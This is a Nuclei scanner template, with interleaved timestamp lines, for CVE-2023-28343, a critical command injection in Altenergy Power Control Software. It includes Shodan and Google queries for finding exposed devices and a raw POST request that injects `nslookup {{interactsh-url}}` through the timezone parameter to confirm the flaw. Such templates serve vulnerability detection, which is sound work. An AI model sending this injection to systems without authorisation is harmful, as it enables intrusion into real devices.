2023-03-22 16:32:10 +00:00
id : CVE-2023-28343
info :
2023-04-10 19:01:22 +00:00
name : Altenergy Power Control Software C1.2.5 - Remote Command Injection
2023-03-22 16:32:10 +00:00
author : pikpikcu
severity : critical
description : |
2023-04-10 19:01:22 +00:00
Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
2023-03-22 16:32:10 +00:00
reference :
- https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md
2023-03-22 18:46:23 +00:00
- https://apsystems.com
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.html
2023-04-10 19:01:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-28343
2023-03-22 16:32:10 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-28343
cwe-id : CWE-78
2023-04-12 10:55:48 +00:00
epss-score : 0.21123
2023-03-22 18:07:01 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-03-22 18:07:01 +00:00
google-query : intitle:"Altenergy Power Control Software"
2023-03-22 18:46:23 +00:00
shodan-query : title:"Altenergy Power Control Software"
2023-04-12 10:55:48 +00:00
tags : cve,cve2023,oast,altenergy,iot,packetstorm
2023-03-22 16:32:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-22 16:32:10 +00:00
- raw :
- |
POST /index.php/management/set_timezone HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With : XMLHttpRequest
Accept-Encoding : gzip, deflate
2023-03-22 18:07:01 +00:00
Referer : {{RootURL}}/index.php/management/datetime
2023-03-22 16:35:47 +00:00
2023-03-22 18:07:01 +00:00
timezone=`nslookup {{interactsh-url}}`
2023-03-22 16:35:47 +00:00
2023-03-22 18:07:01 +00:00
matchers-condition : and
2023-03-22 16:32:10 +00:00
matchers :
- type : word
part : interactsh_protocol # Confirms the DNS Interaction
words :
- "dns"
2023-03-22 18:07:01 +00:00
- type : word
part : body
words :
- "Time Zone updated successfully"
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200